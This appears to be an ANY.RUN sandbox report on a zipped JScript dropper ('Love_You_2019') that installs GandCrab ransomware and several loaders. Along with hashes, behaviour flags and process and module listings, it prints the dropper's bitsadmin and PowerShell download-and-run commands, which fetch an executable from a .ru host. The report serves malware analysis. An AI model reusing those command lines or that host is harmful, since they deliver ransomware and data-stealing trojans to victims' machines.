General Info

File name

Love_You_2019_33235120-txt.zip

Full analysis
https://app.any.run/tasks/31a750d1-eb82-439e-88a1-ecd16dc2bb9c
Verdict
Malicious activity
Analysis date
1/10/2019, 17:48:03
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

loader

trojan

ransomware

gandcrab

Indicators:

MIME:
application/zip
File info:
Zip archive data, at least v1.0 to extract
MD5

4ba6f3bb179c007d8235821b4dfb3b2e

SHA1

2372175819b3fc2ee9e828b2f54749a0abaa224c

SHA256

b25d091456ac14f044c01f9449d4dd86687fd083d563a43d5571d485283e917a

SSDEEP

24:LraergaheN8YR9M4VDTX6FHoH+4D1mz0EtofWVWn6UtcX4oAphGpxraeLgkg:faergahi8Y9M4VDOK1mIEtO6UtMAphGY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Application was dropped or rewritten from another process
  • 1958842343.exe (PID: 2160)
  • 3088011411.exe (PID: 2124)
  • 3358028963.exe (PID: 3828)
  • 3782739527.exe (PID: 3124)
  • 979574639568794.exe (PID: 3844)
  • winsvcs.exe (PID: 2648)
  • wincfg32svc.exe (PID: 3568)
  • 3875839546.exe (PID: 3676)
  • 3468116065.exe (PID: 2180)
  • winsvcs.exe (PID: 2928)
  • 2746537711.exe (PID: 3736)
  • 495958594939.exe (PID: 1820)
Downloads executable files from IP
  • winsvcs.exe (PID: 2648)
Renames files like Ransomware
  • 3468116065.exe (PID: 2180)
Changes settings of System certificates
  • 3468116065.exe (PID: 2180)
Dropped file may contain instructions of ransomware
  • 3468116065.exe (PID: 2180)
Connects to CnC server
  • 3468116065.exe (PID: 2180)
Deletes shadow copies
  • 3468116065.exe (PID: 2180)
Changes Security Center notification settings
  • winsvcs.exe (PID: 2928)
GandCrab keys found
  • 3468116065.exe (PID: 2180)
Writes file to Word startup folder
  • 3468116065.exe (PID: 2180)
Changes the autorun value in the registry
  • 3875839546.exe (PID: 3676)
  • 2746537711.exe (PID: 3736)
  • 979574639568794.exe (PID: 3844)
Disables Windows System Restore
  • winsvcs.exe (PID: 2928)
Disables Windows Defender Real-time monitoring
  • winsvcs.exe (PID: 2928)
Actions looks like stealing of personal data
  • 3468116065.exe (PID: 2180)
Downloads executable files from the Internet
  • powershell.exe (PID: 3784)
  • winsvcs.exe (PID: 2648)
Uses BITADMIN.EXE for downloading application
  • cmd.exe (PID: 2544)
Executes PowerShell scripts
  • cmd.exe (PID: 2700)
Reads Internet Cache Settings
  • 3468116065.exe (PID: 2180)
Connects to SMTP port
  • wincfg32svc.exe (PID: 3568)
Reads the cookies of Mozilla Firefox
  • 3468116065.exe (PID: 2180)
Creates files like Ransomware instruction
  • 3468116065.exe (PID: 2180)
Adds / modifies Windows certificates
  • 3468116065.exe (PID: 2180)
Executable content was dropped or overwritten
  • winsvcs.exe (PID: 2928)
  • 979574639568794.exe (PID: 3844)
  • 3875839546.exe (PID: 3676)
  • powershell.exe (PID: 3784)
  • 2746537711.exe (PID: 3736)
  • winsvcs.exe (PID: 2648)
Starts itself from another location
  • winsvcs.exe (PID: 2928)
  • 2746537711.exe (PID: 3736)
  • 979574639568794.exe (PID: 3844)
  • 3875839546.exe (PID: 3676)
Creates files in the program directory
  • 3468116065.exe (PID: 2180)
Creates files in the user directory
  • winsvcs.exe (PID: 2648)
  • powershell.exe (PID: 3784)
  • 3468116065.exe (PID: 2180)
Starts CMD.EXE for commands execution
  • WScript.exe (PID: 2884)
Dropped object may contain TOR URL's
  • 3468116065.exe (PID: 2180)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.zip
|   ZIP compressed archive (100%)
EXIF
ZIP
ZipRequiredVersion:
10
ZipBitFlag:
null
ZipCompression:
None
ZipModifyDate:
2004:01:10 15:25:17
ZipCRC:
0x96a24e80
ZipCompressedSize:
1155
ZipUncompressedSize:
1155
ZipFileName:
Love_You_2019_33235120-txt.js

Screenshots

Processes

Total processes
53
Monitored processes
19
Malicious processes
9
Suspicious processes
1

Behavior graph

+
start download and start drop and start download and start download and start download and start download and start download and start drop and start drop and start drop and start drop and start winrar.exe no specs wscript.exe no specs cmd.exe no specs cmd.exe no specs bitsadmin.exe no specs powershell.exe 979574639568794.exe winsvcs.exe 495958594939.exe no specs 2746537711.exe 3875839546.exe winsvcs.exe wincfg32svc.exe #GANDCRAB 3468116065.exe 1958842343.exe no specs 3088011411.exe no specs wmic.exe no specs 3358028963.exe no specs 3782739527.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
2820
CMD
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Love_You_2019_33235120-txt.zip"
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0
Modules
Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\audiodev.dll
c:\windows\system32\wmvcore.dll
c:\windows\system32\wmasf.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\profapi.dll
c:\windows\system32\wshext.dll
c:\windows\system32\wscript.exe
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll

PID
2884
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Love_You_2019_33235120-txt.js"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\jscript.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\sspicli.dll

PID
2544
CMD
"C:\Windows\System32\cmd.exe" /c bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\admin\AppData\Local\Temp\495958594939.exe&start C:\Users\admin\AppData\Local\Temp\495958594939.exe
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\bitsadmin.exe
c:\users\admin\appdata\local\temp\495958594939.exe

PID
2700
CMD
"C:\Windows\System32\cmd.exe" /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\admin\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\admin\AppData\Local\Temp\979574639568794.exe'
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
3664
CMD
bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\admin\AppData\Local\Temp\495958594939.exe
Path
C:\Windows\system32\bitsadmin.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
BITS administration utility
Version
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\lpk.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\qmgrprxy.dll

PID
3784
CMD
PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\admin\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\admin\AppData\Local\Temp\979574639568794.exe'
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\users\admin\appdata\local\temp\979574639568794.exe
c:\windows\system32\netutils.dll

PID
3844
CMD
"C:\Users\admin\AppData\Local\Temp\979574639568794.exe"
Path
C:\Users\admin\AppData\Local\Temp\979574639568794.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\979574639568794.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\shell32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\apphelp.dll
c:\users\admin\495030305060\winsvcs.exe

PID
2648
CMD
C:\Users\admin\495030305060\winsvcs.exe
Path
C:\Users\admin\495030305060\winsvcs.exe
Indicators
Parent process
979574639568794.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\495030305060\winsvcs.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\shell32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\version.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\apphelp.dll
c:\users\admin\appdata\local\temp\2746537711.exe
c:\users\admin\appdata\local\temp\3875839546.exe
c:\users\admin\appdata\local\temp\3468116065.exe
c:\users\admin\appdata\local\temp\3358028963.exe
c:\users\admin\appdata\local\temp\3782739527.exe

PID
1820
CMD
C:\Users\admin\AppData\Local\Temp\495958594939.exe
Path
C:\Users\admin\AppData\Local\Temp\495958594939.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\495958594939.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\shell32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll

PID
3736
CMD
C:\Users\admin\AppData\Local\Temp\2746537711.exe
Path
C:\Users\admin\AppData\Local\Temp\2746537711.exe
Indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\2746537711.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\wininet.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\apphelp.dll
c:\users\admin\657607470096780\winsvcs.exe

PID
3676
CMD
C:\Users\admin\AppData\Local\Temp\3875839546.exe
Path
C:\Users\admin\AppData\Local\Temp\3875839546.exe
Indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\3875839546.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
